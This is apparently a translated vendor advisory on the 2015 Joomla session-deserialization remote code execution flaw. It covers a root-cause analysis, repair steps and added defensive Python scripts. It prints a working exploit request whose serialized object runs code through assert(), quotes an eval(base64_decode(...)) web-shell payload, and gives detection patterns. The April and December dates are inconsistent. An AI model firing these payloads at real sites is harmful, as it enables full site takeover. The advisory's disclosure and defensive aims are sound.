Ali Cloud security · 2015/12/16 16:05

Author: Aliyun Security attack and defense team

Recently Joomla was again hit by a high-risk 0day vulnerability that allows remote command execution. Aliyun Cloud Shield launched the corresponding interception rules yesterday to block the vulnerability, and cloud hosting customers were notified by phone and given automated fixes. According to our statistics, by the early morning of April 16 hundreds of malicious IP addresses had attempted to use the vulnerability to attack websites hosted on Aliyun. Cloud Shield successfully blocked tens of thousands of attack requests; the attacker with the highest request count tried to penetrate more than 1,000 Joomla websites within a single hour.

Joomla officially released 3.4.6 as an emergency release because of this bug. Besides upgrading to the latest version as soon as possible, Joomla users can also apply the more complete fix provided by the Aliyun security team to harden their sites; see section 0x03 Vulnerability Repair for details.

0x00 Vulnerability Description


Yesterday the Joomla security team urgently released Joomla 3.4.6, which fixes a high-risk 0day vulnerability. The vulnerability affects all versions from 1.5 through 3.4.5 and allows arbitrary PHP code to be executed directly from the front end without logging in.

0x01 Vulnerability Exploitation


The vulnerability is triggered by sending the malicious payload to the site in the User-Agent or X-Forwarded-For header and then sending a second request that carries the cookie value the site returned. Alternatively, specifying a cookie value in the first request and sending the same cookie value in the second request also triggers it.

Request:

```http
GET / HTTP/1.1
Host: 127.0.0.1
X-Forwarded-For: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ð
Cookie: 3342514dde143a04dad958b2eb5a748a=pd4nnqlps2suk9r70189jkpdn2
```

Request 2:

```http
GET / HTTP/1.1
Host: 127.0.0.1
Cookie: 3342514dde143a04dad958b2eb5a748a=pd4nnqlps2suk9r70189jkpdn2
```

If execution succeeds, the output of phpinfo() is shown in the response to request 2.

0x02 Vulnerability Analysis


In the file libraries/joomla/session/session.php, Joomla stores HTTP_USER_AGENT and HTTP_X_FORWARDED_FOR directly in the session:

```php
...
// Record proxy forwarded for in the session in case we need it later
if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
    $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);
}
...
// Check for clients browser
if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))
{
    $browser = $this->get('session.client.browser');

    if ($browser === null)
    {
        $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);
    }
}
```

Following Joomla's session handling further, the JSessionStorage class in libraries/joomla/session/storage.php uses session_set_save_handler() to register the read() and write() methods of the session storage. As defined in the PHP manual, the data returned by read() and passed to write() is unserialized and serialized automatically; this serialization is done by the PHP core.

Continuing into the read() and write() functions, whose code lives under libraries/joomla/session/storage, the implementations of all the session storage engines show that Joomla writes the session value without any safety processing. By default Joomla uses the database engine to store sessions, which is also one of the conditions for this vulnerability to be exploitable. The exploit takes advantage of MySQL's character truncation behaviour and ends up writing a damaged, invalid serialized object into the database. When this object is read back by read(), the PHP core (PHP <= 5.6.13) fails to unserialize session.client.forwarded in php_var_unserialize and then moves on to the next key-value attempt: it takes the attacker-injected "|" as the separator, parses the key and value, and deserializes the attacker's object, which leads to the execution of the object's methods.

There are two root causes of the vulnerability: the session parser bug in the PHP core and the character truncation behaviour of the MySQL database. The vulnerability cannot be reproduced if the session storage engine in use does not have character truncation behaviour like MySQL's. When testing this vulnerability, we set $session_handler in the Joomla configuration file configuration.php to None, meaning sessions are stored in the file system.

0x03 Vulnerability Repair


Joomla officially released version 3.4.6 yesterday. Comparing the code, we found that the official update only removes the code in libraries/joomla/session/session.php that writes HTTP_USER_AGENT into the session variable and adds validation that the IP obtained from HTTP_X_FORWARDED_FOR is really an IP address, which fixes the entry points used by the public exploit. However, the JSessionStorage class's unsafe handling of sessions is not fixed officially, so this fix may be bypassed: the same construction can trigger the vulnerability as soon as an attacker finds a new location where a SESSION value is controllable.

The following is a more complete repair scheme:

Modify configuration.php in the Joomla root directory and change $session_handler to None, which sets the session storage engine to the file system. Upgrade PHP to 5.6.13 or higher.

Log in to the Joomla backend and upgrade to version 3.4.6 or higher.
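Added example, not part of the original post or of Joomla itself: a small audit script for the repair scheme above. It assumes a configuration.php in the JConfig class format Joomla writes, that the file-system engine is selected by the lowercase value 'none', and that the PHP and Joomla versions are passed in as strings; the sample configuration is constructed.

```python
import re

# Constructed sample of a Joomla configuration.php (hypothetical values) in the JConfig
# class format Joomla writes; only the settings the repair scheme touches matter here.
SAMPLE_CONFIG = """<?php
class JConfig {
    public $session_handler = 'database';
    public $dbtype = 'mysqli';
    public $lifetime = '15';
}
"""
SETTING = re.compile(r"public\s+\$(\w+)\s*=\s*'([^']*)'\s*;")

def parse_config(text):
    """Extract the quoted scalar settings of configuration.php into a dict."""
    return dict(SETTING.findall(text))

def version_tuple(v):
    """'5.6.13-0+deb8u1' -> (5, 6, 13); tolerates distribution suffixes."""
    return tuple(int(x) for x in re.findall(r"\d+", v)[:3])

def audit(config_text, php_version, joomla_version):
    """Check a site against the repair scheme; an empty list means it is hardened."""
    cfg = parse_config(config_text)
    findings = []
    handler = cfg.get("session_handler", "database")
    if handler.lower() != "none":
        findings.append(f"session_handler is '{handler}': sessions are not stored in the "
                        "file system; set it to 'none'")
    if version_tuple(php_version) < (5, 6, 13):
        findings.append(f"PHP {php_version} is below 5.6.13 and keeps the session parser bug")
    if version_tuple(joomla_version) < (3, 4, 6):
        findings.append(f"Joomla {joomla_version} is below the fixed release 3.4.6")
    return findings

def harden_config(config_text):
    """Switch $session_handler to 'none' (file-system storage), leaving other settings intact."""
    return re.sub(r"(public\s+\$session_handler\s*=\s*)'[^']*'", r"\1'none'", config_text)
```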

0x04 Threat Status


According to our statistics, by the early morning of April 16 hundreds of malicious IP addresses had attempted to use the vulnerability to attack websites hosted on Aliyun. Cloud Shield successfully blocked tens of thousands of attack requests; the attacker with the highest request count tried to penetrate more than 1,000 Joomla websites within a single hour.

From the payload analysis, most attackers insert code such as eval(base64_decode($_POST[a])) in the first request and try to write a web shell (Trojan) into the site's root directory in the second request. If the attack succeeds, the site is completely controlled by the attacker. Some attackers use detection payloads that are public on the Internet, such as phpinfo() and md5(233333); such code generally does not pose a threat to the site.
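Added example, not code from the original post or from Cloud Shield: a request inspector in the spirit of the interception rules mentioned above, covering both the header pattern shown in 0x01 and the payload function names listed in this section. It flags User-Agent and X-Forwarded-For values that carry a serialized PHP object, the session key separator, or a dangerous function name, and rejects an X-Forwarded-For that is not a list of IP addresses; the two sample requests are constructed.

```python
import re
from ipaddress import ip_address
# Headers that Joomla <= 3.4.5 copied into the session without sanitising.
WATCHED_HEADERS = ("user-agent", "x-forwarded-for")
# O:<len>:"<class>":<n>:{ starts a serialized PHP object; "}<key>|" is a "}" closing
# the previous value followed by the "|" key separator of PHP's session format.
SERIALIZED_OBJECT = re.compile(r'O:\d+:"[\w\\]+":\d+:\{')
SESSION_KEY_INJECT = re.compile(r'\}\s*\w*\|')
# Function names used by the in-the-wild payloads described in 0x04.
DANGEROUS_CALLS = re.compile(r'\b(assert|eval|base64_decode|phpinfo)\b', re.I)

def parse_headers(raw):
    """Map the headers of a raw HTTP request to {lowercased name: value}."""
    headers = {}
    for line in raw.splitlines()[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers

def valid_forwarded_for(value):
    """True only for a comma-separated list of IP addresses (the check 3.4.6 adds)."""
    try:
        for part in value.split(","):
            ip_address(part.strip())
    except ValueError:
        return False
    return True

def inspect_request(raw):
    """Return the findings that make a request look like a Joomla session injection."""
    headers = parse_headers(raw)
    findings = []
    for name in WATCHED_HEADERS:
        value = headers.get(name, "")
        if SERIALIZED_OBJECT.search(value):
            findings.append(f"{name}: serialized PHP object")
        if SESSION_KEY_INJECT.search(value):
            findings.append(f"{name}: PHP session key separator")
        if DANGEROUS_CALLS.search(value):
            findings.append(f"{name}: dangerous PHP function name")
    xff = headers.get("x-forwarded-for")
    if xff is not None and not valid_forwarded_for(xff):
        findings.append("x-forwarded-for: not an IP address")
    return findings

# Constructed samples, not captured traffic: a normal request and a probe shaped like the
# public payload but cut short, so it carries only the markers, not a working exploit.
BENIGN = "GET / HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0\r\nX-Forwarded-For: 203.0.113.5, 198.51.100.7\r\n"
PROBE = 'GET / HTTP/1.1\r\nHost: 127.0.0.1\r\nX-Forwarded-For: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";\r\n'
```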

Related links:

https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html
https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html 
https://github.com/80vul/phpcodz/blob/master/research/pch-031.md